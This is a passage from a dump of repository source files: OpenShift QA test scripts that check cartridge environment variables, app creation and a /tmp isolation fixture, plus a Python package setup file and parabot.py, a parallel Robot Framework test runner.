'OPENSHIFT_JBOSSEAP_CLUSTER',\n                   'OPENSHIFT_JBOSSEAP_MESSAGING_THROUGHPUT_PORT',\n                   'OPENSHIFT_JBOSSEAP_LOG_DIR',\n                   'OPENSHIFT_JBOSSEAP_CLUSTER_PORT',\n                   'OPENSHIFT_JBOSSEAP_CLUSTER_PROXY_PORT',\n                   'OPENSHIFT_JBOSSEAP_CLUSTER_REMOTING',\n                   'OPENSHIFT_JBOSSEAP_MESSAGING_PORT',\n                   'OPENSHIFT_JBOSSEAP_REMOTING_PORT']\n        self.assert_match(present, self.env_output)\n        removed = ['OPENSHIFT_JBOSS_']\n        self.assert_not_match(removed, self.env_output)\n\n\n    def verify_jenkins(self):\n        present = ['JENKINS_CLIENT_DIR',\n                   'JENKINS_DNS_NAME',\n                   'JENKINS_HOME',\n                   'JENKINS_INSTANCE_DIR',\n                   'OPENSHIFT_JENKINS_LOG_DIR']\n        self.assert_match(present, self.env_output)\n\n\n    def verify_mongodb(self):\n        removed = ['OPENSHIFT_NOSQL']\n        self.assert_not_match(removed, self.env_output)\n        present = ['OPENSHIFT_MONGODB_DB_GEAR_DNS',\n                   'OPENSHIFT_MONGODB_DB_GEAR_UUID',\n                   'OPENSHIFT_MONGODB_DB_HOST',\n                   'OPENSHIFT_MONGODB_DB_PASSWORD',\n                   'OPENSHIFT_MONGODB_DB_PORT',\n                   'OPENSHIFT_MONGODB_SOCKET',\n                   'OPENSHIFT_MONGODB_DB_URL',\n                   
'OPENSHIFT_MONGODB_DB_USERNAME']\n self.assert_match(present, self.env_output)\n\n\n def verify_rockmongo(self):\n present = ['OPENSHIFT_ROCKMONGO_IP',\n 'OPENSHIFT_ROCKMONGO_PORT',\n 'OPENSHIFT_ROCKMONGO_LOG_DIR']\n self.assert_match(present, self.env_output)\n removed = ['OPENSHIFT_ROCKMONGO_CTL_SCRIPT',\n 'OPENSHIFT_ROCKMONGO_GEAR_DIR']\n self.assert_not_match(removed, self.env_output)\n\n\n def verify_ruby(self):\n present = ['OPENSHIFT_RUBY_IP',\n 'OPENSHIFT_RUBY_PORT',\n 'OPENSHIFT_RUBY_LOG_DIR']\n self.assert_match(present, self.env_output)\n\n def verify_phpmyadmin(self):\n removed = ['OPENSHIFT_PHPMYADMIN_CTL_SCRIPT',\n 'OPENSHIFT_PHPMYADMIN_GEAR_DIR']\n self.assert_not_match(removed, self.env_output)\n\n present = ['OPENSHIFT_PHPMYADMIN_IP',\n 'OPENSHIFT_PHPMYADMIN_LOG_DIR',\n 'OPENSHIFT_PHPMYADMIN_PORT']\n self.assert_match(present, self.env_output)\n\n\n def verify_cron(self):\n removed = ['OPENSHIFT_BATCH_CRON_14_EMBEDDED_TYPE',\n 'OPENSHIFT_BATCH_CTL_SCRIPT', \n 'OPENSHIFT_BATCH_TYPE']\n self.assert_not_match(removed, self.env_output)\n present = ['OPENSHIFT_CRON_LOG_DIR']\n self.assert_match(present, self.env_output)\n\n\n def verify_python(self):\n present = ['OPENSHIFT_PYTHON_IP',\n 'OPENSHIFT_PYTHON_LOG_DIR',\n 'OPENSHIFT_PYTHON_PORT']\n self.assert_match(present, self.env_output)\n\n\n def verify_php(self):\n present = ['OPENSHIFT_PHP_IP',\n 'OPENSHIFT_PHP_LOG_DIR',\n 'OPENSHIFT_PHP_PORT']\n self.assert_match(present, self.env_output)\n\n\n def verify_nodejs(self):\n present = ['OPENSHIFT_NODEJS_IP',\n 'OPENSHIFT_NODEJS_PORT',\n 'OPENSHIFT_NODEJS_LOG_DIR']\n self.assert_match(present, self.env_output)\n\n\n def verify_postgresql(self):\n removed = ['OPENSHIFT_DB_']\n self.assert_not_match(removed, self.env_output)\n\n\n def verify_10gen(self):\n self.assert_match('', self.env_output)\n\n\n def verify_env(self):\n (status, self.env_output) = common.run_remote_cmd(self.app_name, \"env|grep OPENSHIFT\", quiet=True)\n self.assert_equal(status, 0, \"Unable to get env from given app\")\n eval(\"self.verify_%s()\"%self.test_variant.split('-')[0])\n #common variables to be present/removed\n present = ['OPENSHIFT_APP_DNS',\n 'OPENSHIFT_APP_NAME',\n 'OPENSHIFT_APP_UUID',\n 'OPENSHIFT_DATA_DIR',\n 'OPENSHIFT_GEAR_NAME',\n 'OPENSHIFT_GEAR_DNS',\n 'OPENSHIFT_GEAR_UUID',\n 'OPENSHIFT_HOMEDIR',\n 'OPENSHIFT_INTERNAL_IP',\n 'OPENSHIFT_INTERNAL_PORT',\n 'OPENSHIFT_REPO_DIR',\n 'OPENSHIFT_TMP_DIR']\n self.assert_match(present, self.env_output)\n removed = ['OPENSHIFT_APP_DIR',\n 'OPENSHIFT_APP_TYPE',\n 'OPENSHIFT_GEAR_CTL_SCRIPT',\n 'OPENSHIFT_GEAR_DIR',\n 'OPENSHIFT_GEAR_TYPE',\n 'OPENSHIFT_RUNTIME_DIR',\n 'OPENSHIFT_PROXY_PORT',\n 'OPENSHIFT_RUN_DIR',\n 'OPENSHIFT_LOG_DIR']\n self.assert_not_match(removed, self.env_output)\n return 0\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(US2105)\n return suite\n\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of US2105.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5798622369766235, "alphanum_fraction": 0.5880616307258606, "avg_line_length": 32.86666488647461, "blob_id": "3363d6dfd8586dcf4bf194c01a4cf217f63bf694", "content_id": "6b3b848904d92707a88a9b1fc63c62a8fa0df38a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3049, "license_type": "no_license", "max_line_length": 169, "num_lines": 90, "path": 
"/automation/open/testmodules/RT/cartridge/cakephp_framework_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[rhc-cartridge]Cakephp framework support\nhttps://tcms.engineering.redhat.com/case/122275/\n\"\"\"\n\nimport os,sys\nimport testcase,common,OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge]Cakephp framework support\"\n\n self.app_name = \"cakephp\"\n self.app_type = common.app_types[\"php\"]\n self.git_repo = os.path.abspath(os.curdir)+\"/\"+self.app_name\n\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s* \"%(self.app_name))\n\n\n\nclass CakephpFrameworkSupport(OpenShiftTest):\n def test_method(self):\n\n # 1.Create an app\n self.steps_list.append( testcase.TestCaseStep(\"1. Create an php app\",\n common.create_app,\n function_parameters=[self.app_name,\n self.app_type,\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 2.Customize this app for cakephp\n self.steps_list.append(testcase.TestCaseStep(\"2.Customize this app for cakephp and Git push\",\n \"cd \"+self.git_repo+\"/php/ && cp \"+WORK_DIR+\"/app_template/cakephp.tar.gz ./ && tar xzf cakephp.tar.gz && git add . && git commit -am t && git push\",\n expect_description=\"cakephp+git push should be installed successfully\",\n expect_return=0))\n\n # 3.Check app via browser\n def get_app_url(app_name):\n def closure():\n return OSConf.get_app_url(self.app_name) + \"/cakephp/\"\n return closure\n\n test_html = \"CakePHP: the rapid development php framework\"\n self.steps_list.append(testcase.TestCaseStep(\"4.Check app via browser\",\n common.grep_web_page,\n function_parameters=[get_app_url(self.app_name), test_html, \"-H 'Pragma: no-cache'\", 3, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CakephpFrameworkSupport)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.536626935005188, "alphanum_fraction": 0.5468483567237854, "avg_line_length": 17.34375, "blob_id": "c83352855570e888dafc980f4d3ca7b5d46e4c22", "content_id": "e3f20bef59c96b1aa5e2505699d9ca6bd05486bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 587, "license_type": "no_license", "max_line_length": 48, "num_lines": 32, "path": "/python-simple-cmd/setup.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''Setup for scmd project\n'''\n\n\nfrom setuptools import setup, find_packages\n\n\nsetup(\n name='scmd',\n license='GPLv3',\n description='scmd is a simple cmd',\n author='Xin Gao',\n 
author_email='[email protected]',\n url='',\n version='0.1',\n classifiers=[\n 'Programming Language :: Python :: 2.7',\n ],\n packages = find_packages(),\n include_package_data = True,\n entry_points = {\n 'console_scripts': ['scmd=scmd:execute']\n },\n requires=[\n 'kerberos',\n 'kobo',\n 'krbcontext'\n ],\n)\n" }, { "alpha_fraction": 0.5716742873191833, "alphanum_fraction": 0.5957568883895874, "avg_line_length": 23.56338119506836, "blob_id": "917e62253668cb70d51c294582efe1b13e7ff09c", "content_id": "baabf953cbacbed0cb3a35e4efbacb633b7948d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1744, "license_type": "no_license", "max_line_length": 85, "num_lines": 71, "path": "/automation/open/testmodules/RT/security/data/polyinstantiation_tmp_dir_rack/config.ru", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# contents of 'config.ru'\nrequire 'rubygems'\nrequire 'bundler'\n\nBundler.require\n\nget '/' do\n \"the time where this server lives is #{Time.now}\n <br /><br />check out your <a href=\\\"/agent\\\"> user_agent</a>\"\nend\n\nget '/agent' do\n \"you're using #{request.user_agent}\"\nend\n\nget '/show' do\n response_body = \"\"\n\n command1 = \"ls -l /tmp/rack_tmp_test 2>&1 && ls -l /var/tmp/rack_var_tmp_test 2>&1\"\n response_body = response_body + \"Command 1: #{command1}\" + \"\\n\"\n output = `#{command1}`\n ret1 = $? >> 8\n response_body = response_body + output + \"\\n\"\n\n command = \"ls -l /tmp 2>&1\"\n response_body = response_body + \"Command: %s\" %(command) + \"\\n\"\n output = `#{command}`\n ret_tmp = $? >> 8\n response_body = response_body + output + \"\\n\"\n\n if ret1 == 0\n response_body = response_body + \"RESULT=0\\n\"\n else\n response_body = response_body + \"RESULT=1\\n\"\n end\n\n \"#{response_body}\"\nend\n\nget '/create' do\n response_body = \"\"\n\n command1 = \"touch /tmp/rack_tmp_test 2>&1\"\n response_body = response_body + \"Command 1: #{command1}\" + \"\\n\"\n output = `#{command1}`\n ret1 = $? >> 8\n response_body = response_body + output + \"\\n\"\n\n command2 = \"touch /var/tmp/rack_var_tmp_test 2>&1\"\n response_body = response_body + \"Command 2: #{command2}\" + \"\\n\"\n output = `#{command2}`\n ret2 = $? >> 8\n response_body = response_body + output + \"\\n\"\n\n command = \"ls -l /tmp 2>&1\"\n response_body = response_body + \"Command: #{command}\" + \"\\n\"\n output = `#{command}`\n ret_tmp = $? 
>> 8\n response_body = response_body + output + \"\\n\"\n\n if ret1 == 0 and ret2 == 0\n response_body = response_body + \"RESULT=0\\n\"\n else\n response_body = response_body + \"RESULT=1\\n\"\n end\n\n \"#{response_body}\"\n\nend\n\nrun Sinatra::Application\n" }, { "alpha_fraction": 0.6029520034790039, "alphanum_fraction": 0.6332103610038757, "avg_line_length": 20.492063522338867, "blob_id": "7a0352965e5fa7b2fe383d6edfa25c7261c2fa38", "content_id": "b2affc3552f66910e3ff3e94e9e6bbdc93e83e0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1355, "license_type": "no_license", "max_line_length": 211, "num_lines": 63, "path": "/automation/open/testmodules/UI/web/case_180946.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_180946.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass DeleteSpringeap6App(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n\n #create a springeap6 app\n web.create_app(\"springeap6\", \"sprinteap\")\n \n time.sleep(20)\n web.assert_text_equal_by_xpath('''Your application has been created. If you're new to OpenShift check out these tips for where to go next.''', '''//div[@id='content']/div/div/div/div[2]/div/section/p''')\n \n \n\n #delete a springeap app\n web.delete_last_app(\"springeap\")\n \n\n self.tearDown()\n\n return self.passed(\" case_180946--DeleteSpringeap6App passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(DeleteSpringeap6App)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_180946.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5915622115135193, "alphanum_fraction": 0.5976765751838684, "avg_line_length": 35.7528076171875, "blob_id": "f2ce1349a00f26cce0af5e7fcce83e8d76f681d2", "content_id": "96e9318c24e9cf451fc8d8e8a63957cfc74b0ede", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3271, "license_type": "no_license", "max_line_length": 158, "num_lines": 89, "path": "/automation/open/testmodules/RT/job_related/create_domain.py.O", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport common\nimport rhtest\nimport OSConf\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n etc_dir = common.get_etc_dir()\n common.env_setup()\n self.domain_name = common.getRandomString(10)\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.key_files = \"%s/libra_key/id_rsa*\" %(etc_dir)\n if self.get_run_mode() == \"OnPremise\":\n self.pem_file = \"%s/onpremise/onpremise.pem\" %(etc_dir)\n else:\n self.pem_file = \"%s/libra.pem\" %(etc_dir)\n self.max_gears = common.DEV_MAX_GEARS\n\n def finalize(self):\n pass\n\n\nclass CreateDomain(OpenShiftTest):\n def test_method(self):\n if not os.path.exists(os.path.expanduser(\"~/.ssh/id_rsa.pub\")):\n # only copy the pre-configured id_rsa if one does not 
exist\n self.info(\"Copy already prepared libra ssh key file\")\n ret = common.command_get_status(\"mkdir -p $HOME/.ssh && chmod 400 %s %s && cp -rf %s $HOME/.ssh\" %(self.key_files, self.pem_file, self.key_files))\n self.assert_equal(ret, 0, \"~/.ssh dir is created, and libra key files are copied\")\n\n #common.prepare_libra_sshkey()\n #common.clean_up(user_email, user_passwd)\n\n self.info(\"Create/Alter domain for express user\")\n ret = common.create_domain(self.domain_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n if ret!=0:\n ret = common.alter_domain(self.domain_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"domain should be created/altered successfully\")\n\n self.info(\"Remove 'default' ssh key for user\")\n common.remove_sshkey()\n\n self.info(\"Add ssh key\")\n ret = common.add_sshkey()\n self.assert_equal(ret, 0, \"Failed to add/update ssh key for user\")\n\n self.info(\"Remove ssh known hosts in case host key changes\")\n path = os.path.expanduser(\"~/.ssh/known_hosts\")\n if os.path.exists(path):\n os.remove(path)\n\n self.info(\"Change permission of %s to 600\" %(self.pem_file))\n ret = common.command_get_status(\"chmod 600 %s\" %(self.pem_file))\n self.assert_equal(ret, 0, \"permission of %s should be changed to 600\" %(self.pem_file))\n if self.get_run_mode() == 'DEV' or self.get_run_mode() == 'OnPremise':\n self.info(\"Set max gears to %s\" % (self.max_gears))\n ret = common.set_max_gears(self.user_email, self.max_gears)\n self.assert_equal(ret, 0, \"Failed to set max gears\")\n\n #if common.is_multinode_env():\n # common.setup_multi_node_env()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateDomain)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6217313408851624, "alphanum_fraction": 0.6277869343757629, "avg_line_length": 34.53056335449219, "blob_id": "ed1280fe5826ab3838f6a189aad99ce24b7b0390", "content_id": "8476e8d043163bb0a759039fbe41340e18f05c68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14532, "license_type": "no_license", "max_line_length": 113, "num_lines": 409, "path": "/parabot/parabot.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n#\n# Script to execute test cases from one suite in parallel\n# by thomas klein / 2009\n#\n\n#parabot.py -- main test execution class\n\n\n# imports\nfrom robot.running import TestSuite\nfrom robot import utils\nfrom robot.conf import settings\nimport os, glob\nimport subprocess\nimport time\nfrom datetime import datetime\nimport sys\nimport getopt\nimport ParabotConfig as config\n\n# save current time to calculate execution time at the end of the script\nstartTime = datetime.now()\n\n# global vars\nsuite_name = \"No suite defined yet\" # specified via args\nincludeTags = [] # specified via args\nexcludeTags = [] # specified via args\npara_tag = \"parallel\"\nclientCwd = \"No cwd defined\" # specified via testsuite from args\nforceSerialExecution = False\nbaseDir = \"./\"\n\n\n# reading variables from ParabotConfig\nmax_parallel_tests = config.MAX_PARALLEL_TESTS\nmin_test_per_block = config.MIN_TESTS_PER_BLOCK\nlogFolder = config.LOG_DIR\nantBatch = os.path.abspath(config.ANT_BATCH_FILE)\nseCwd = 
os.path.abspath(config.SELENIUM_GRID_DIR)\nstartSelenium = config.AUTOSTART_SELENIUM\nbrowser = config.SELENIUM_BROWSER\n\n\n# Methods #####################################################################################################\n\ndef splitTestsToBlocks(tests):\n    \"\"\" Splits a list of tests into several small lists (blocks) and returns a list containing these lists.\n        'MAX_PARALLEL_TESTS' and 'MIN_TESTS_PER_BLOCK' will be used as criteria for splitting the list. For \n        details see configuration hints in ParabotConfig.py.\n    \"\"\"\n    para_test_blocks = []\n    number_of_blocks = -1\n    if len(tests) / min_test_per_block > max_parallel_tests:\n        number_of_blocks = max_parallel_tests\n    else:\n        number_of_blocks = len(tests) / min_test_per_block\n    for i in range(0, number_of_blocks):\n        para_test_blocks.append([])\n    current_block = 0\n    for test in tests:\n        block = current_block%number_of_blocks\n        para_test_blocks[block].append(test)\n        current_block = current_block+1\n    return para_test_blocks\n\ndef startSeleniumHub():\n    \"\"\" Starts a Selenium Hub on localhost:4444 and returns the process handle \n    \"\"\"\n    hubScript = \"%s launch-hub\" % antBatch\n    hubLog = open(os.path.join(logFolder,\"Parabot_Hub_Log.txt\"), \"w\")\n    print \"Starting Selenium Hub ...\"\n    process = subprocess.Popen(hubScript, cwd=seCwd, stdout=hubLog, stderr=hubLog)\n    time.sleep(10)\n    return process\n\ndef startSeleniumRC(port):\n    \"\"\" Starts a Selenium Remote Control connecting to a Selenium hub on localhost:4444. Process handle to\n        the RC will be returned.\n        'port' is the port the RC will be using to communicate with the hub\n    \"\"\"\n    rcScript = \"%s -Dport=%s -Dhost=127.0.0.1 -DhubURL=http://127.0.0.1:4444 -Denvironment=\\\"%s\\\"\" \\\n               \" launch-remote-control\" % (antBatch, port, browser)\n    rcLog = open(os.path.join(logFolder,(\"Parabot_RC_%s_Log.txt\" % port)), \"w\")\n    print \"Starting Selenium RC (%s) on port %s ...\" % (browser,port)\n    process = subprocess.Popen(rcScript, cwd=seCwd, stdout=rcLog, stderr=rcLog)\n    return process\n\ndef startSeleniumRCs(howMuch):\n    \"\"\" Starts a given number of Selenium Remote Controls (calls startSeleniumRC(port)) and returns a list \n    of processes referring to the RCs. 
Ports 5556 and up will be used for the RCs.\n 'howMuch' defines the number of RCs to start\n \"\"\"\n rcs = []\n for i in range(5556, 5556+howMuch):\n rcs.append(startSeleniumRC(i))\n time.sleep(5)\n return rcs\n\ndef startPybot(name, tests, suite, args=[]):\n \"\"\" Creates a pybot object, starts it and returns the object\n 'name' is the name for the pybot (will be used for log outputs)\n 'tests' is a list of tests to be executed by the pybot\n 'suite' is the filename of the test suite containing the 'tests'\n 'args' (optional) is a list of additional parameters passed to pybot\n \"\"\"\n pybot = Pybot(name)\n pybot.start(tests, suite, args)\n return pybot\n\ndef generateReportAndLog(xmlFiles, reportFile, logFile):\n \"\"\" Calls RobotFrameworks rebot tool to generate Report and Log files from output.xml files\n 'xmlFiles' is a list of output.xml files from jybot / pybot\n 'reportFile' is the path+name of the report.html file to be written\n 'logFile' is the path+name of the log.html file to be written\n the global variable 'suite_name' will be used a report title\n \"\"\"\n rebotCommand = \"rebot.bat --log %s --report %s --reporttitle \\\"%s\\\" \" % (logFile, reportFile, suite_name)\n for file in xmlFiles:\n rebotCommand = rebotCommand + \"%s \" % file\n rc = os.system(rebotCommand)\n return rc\n\ndef parseArgs(argv):\n \"\"\" Parses command line arguments like the testsuite name and additonal parameters \n Expects the command line args without the python class as parameter argv (sys.argv[1:])\n Fails and aborts script if args don't match the expected format\n \"\"\"\n global includeTags, excludeTags, suite_name, clientCwd, forceSerialExecution, baseDir, logFolder\n if len(argv)<1:\n usage()\n sys.exit(2)\n try:\n # checking for additional options (-h -i -e etc)\n opts, args = getopt.getopt(argv, \"hi:e:fb:\", [\"help\", \"include=\", \"exclude=\", \"forceserial\", \"basedir=\"])\n for opt, arg in opts:\n if opt in (\"-h\", \"--help\"):\n usage()\n sys.exit(2)\n elif opt in (\"-i\", \"--include\"):\n includeTags.append(arg)\n elif opt in (\"-e\", \"--exclude\"):\n excludeTags.append(arg)\n elif opt in (\"-f\", \"--forceserial\"):\n forceSerialExecution = True\n print \"Forcing serial test execution!\"\n elif opt in (\"-b\", \"--basedir\"):\n baseDir = arg\n if len(argv)==2:\n usage()\n sys.exit(2)\n if len(includeTags) > 0:\n print \"Including Tags: %s\" % includeTags\n if len(excludeTags) >0:\n print \"Excluding Tags: %s\" % excludeTags\n except getopt.GetoptError:\n print \"Error while parsing command line arguments\"\n sys.exit(2)\n # last argument is test suite name\n suite_name = argv[len(argv)-1]\n clientCwd, suite_name = os.path.split(suite_name)\n if len(clientCwd) == 0:\n clientCwd = \"./\"\n suite_name = os.path.join(baseDir, suite_name)\n logFolder = os.path.join(clientCwd, logFolder)\n logFolder = os.path.abspath(logFolder)\n print \"Working dir: %s\" % os.path.realpath(clientCwd)\n print \"Base dir: %s\" % os.path.realpath(baseDir);\n print \"Log dir: %s\" % logFolder\n print \"Executing suite: %s\" % suite_name\n\ndef getDynArgs(index):\n \"\"\" Reads the DYN_ARGS variable from the config file and parses it into a list of argument strings\n like --variable name:\"value\".\n This list can be passed to the Pybot start() method as args[] list.\n \"\"\"\n arglist = []\n for row in config.DYN_ARGS:\n valueIndex = index\n if len(row) < 2:\n print \"Error reading DYN_ARGS: Row is invalid: %s. 
Row will be skipped!\" % row\n else:\n varName = row[0]\n values = []\n i = 1\n while i < len(row):\n values.append(row[i])\n i = i+1\n if valueIndex >= len(values):\n valueIndex = (len(values)-1) % valueIndex\n varValue = values[valueIndex]\n arglist.append(\"--variable %s:\\\"%s\\\"\" % (varName, varValue))\n return arglist\n\ndef usage():\n \"\"\" Prints usage information for Parabot \"\"\"\n print \"\"\n print \"Usage: python parabot.py [options] <testsuite.tsv>\"\n print \"\"\n print \"<testsuite.tsv> can be absolute or relative path + filename of a testsuite.\"\n print \"The containing folder will be used as working directory\"\n print \"\"\n print \"Options:\"\n print \"-h\\t--help\\t\\tThis screen\"\n print \"-i\\t--include\\tInclude a tag\"\n print \"-e\\t--exclude\\tExclude a tag\"\n print \"-f\\t--forceserial\\tForces serial test execution\"\n print \"-b\\t--basedir\\tSet parabots base dir\"\n print \"\"\n\n# helper classes ##############################################################################################\n\nclass Pybot():\n \"\"\" Helper class to interact with RobotFrameworks pybot script to execute tests / test suites. \n \"\"\"\n name = \"\"\n tests = []\n suite = \"\"\n args = []\n output = \"\"\n process = -1\n running = False\n \n def __init__(self, name):\n \"\"\" Constructor, creates the object and assigns the given 'name'.\n \"\"\"\n self.name = name\n print \"Created pybot %s.\" %name\n \n def start(self, tests, suite, args=[]):\n \"\"\" Starts the pybot script from RobotFramework executing the defined 'tests' from the given 'suite'.\n 'tests' is a list of tests to be executed by the pybot\n 'suite' is the filename of the test suite containing the 'tests'\n 'args' (optional) is a list of additional parameters passed to pybot\n \"\"\"\n self.tests = tests\n self.suite = suite\n self.args = args\n temp, suiteName = os.path.split(suite_name)\n self.output = \"%s_%s_Output.xml\" % (suiteName, self.name)\n pybotCommand = \"pybot.bat \"\n for test in self.tests:\n pybotCommand = pybotCommand + \"-t \\\"%s\\\" \" % test\n for arg in self.args:\n pybotCommand = pybotCommand + arg + \" \"\n pybotCommand = pybotCommand + \"-o %s \" % os.path.join(logFolder, self.output)\n pybotCommand = pybotCommand + \"-l NONE \"\n pybotCommand = pybotCommand + \"-r NONE \"\n pybotCommand = pybotCommand + \"-N \\\"%s %s\\\" \" % (suiteName, self.name)\n pybotCommand = pybotCommand + suite\n #print pybotCommand\n pyLog = open(os.path.join(logFolder, (\"Pybot_%s_Log.txt\" % self.name)), \"w\")\n print \"Starting pybot %s ...\" % self.name\n self.running = True\n self.process = subprocess.Popen(pybotCommand, cwd=clientCwd, stdout=pyLog, stderr=pyLog)\n \n def isRunning(self):\n \"\"\" Polls the pybot subprocess to check if it's running. 
Will return true if the process is running.\n Returns false if the process hasn't been started or has finished already.\n \"\"\"\n if not self.running:\n return False\n elif self.process.poll() == 0 or self.process.returncode >= 0:\n return False\n else:\n return True\n \n def stop(self):\n \"\"\" Kills the pybot subprocess.\n \"\"\"\n os.system(\"taskkill /T /F /PID %s\" % self.process.pid)\n self.running = False\n\n# MAIN SCRIPT #################################################################################################\n\n# parsing command line arguments\nparseArgs(sys.argv[1:])\n\n# generating two lists containing parallel and serial tests\npara_tests = []\nseri_tests = []\ntry:\n # RobotFramework 2.0.4\n suite = TestSuite(os.path.join(clientCwd, suite_name), process_curdir=False)\nexcept Exception:\n # RobotFramework 2.5\n suiteOps = settings.RobotSettings()\n suite = TestSuite([os.path.join(clientCwd, suite_name)], suiteOps)\n\nfor test in suite.tests:\n # special treatment for tests without tags:\n # include them into serial execution as long as no include tags are defined\n if not test.tags and len(includeTags)==0:\n seri_tests.append(test.name)\n # tests with tags:\n # filter excluded tests (if any), then filter included tests (if any), then scan for\n # parallel keyword and assign to parallel / serial block\n elif len(excludeTags)==0 or not test._contains_any_tag(excludeTags):\n if len(includeTags)==0 or test._contains_any_tag(includeTags):\n if test._contains_tag(para_tag) and not forceSerialExecution:\n para_tests.append(test.name)\n else:\n seri_tests.append(test.name)\n\n# output serial test list\nprint \"\"\nprint \"Serial tests:\"\nif len(seri_tests) == 0:\n print \"NONE\"\nelse:\n for test in seri_tests:\n print test\n \n# splitting parallel tests into blocks \npara_test_blocks = splitTestsToBlocks(para_tests)\n\n# output parallel test list\nprint \"\"\nprint \"Parallel Blocks:\"\nfor block in para_test_blocks:\n print \"\"\n for test in block:\n print test\nif len(para_test_blocks) == 0:\n print \"NONE\"\nprint \"\"\n\n\n# starting selenium components\nif startSelenium:\n seHub = startSeleniumHub()\n numberOfRCs = max(len(para_test_blocks), 1)\n seRCs = startSeleniumRCs(numberOfRCs)\n\n# starting parallel pybots\ni = 0;\npybots = []\nfor block in para_test_blocks:\n dynArgs = getDynArgs(i);\n pybots.append(startPybot(\"paraBlock_%s\" % i, block, suite_name, dynArgs))\n i = i+1\n # delay start of next pybot\n time.sleep(5)\n\n# waiting for parallel tests to finish\nfinished = False\nwhile not finished:\n time.sleep(10)\n message = \"Finished: %s\" % finished\n finished = True\n for pybot in pybots:\n message = \"%s | %s: \" % (message, pybot.name)\n if pybot.isRunning():\n finished = False\n message = \"%s%s\" % (message, \"Running\")\n else:\n message = \"%s%s\" % (message, \"DONE\")\n print message\n \nprint \"Parallel Tests finished ...\"\n\n\n# running serial block\npybot = None\nif len(seri_tests) > 0:\n print \"\"\n print \"Starting serial tests ...\"\n pybot = startPybot(\"serial_block\", seri_tests, suite_name, getDynArgs(0))\n while pybot.isRunning():\n time.sleep(5)\n \n print \"Serial tests finished\"\n print \"\"\n\n\n# killing Selenium Hub / RCs\nif startSelenium:\n print \"Killing Selenium Hub and RCs\"\n os.system(\"taskkill /T /F /PID %s\" % seHub.pid)\n for rc in seRCs:\n os.system(\"taskkill /T /F /PID %s\" % rc.pid)\n print \"\"\n\n\n# merging outputs to one report and log\nprint \"Generating report and log\"\ntemp, suiteName = 
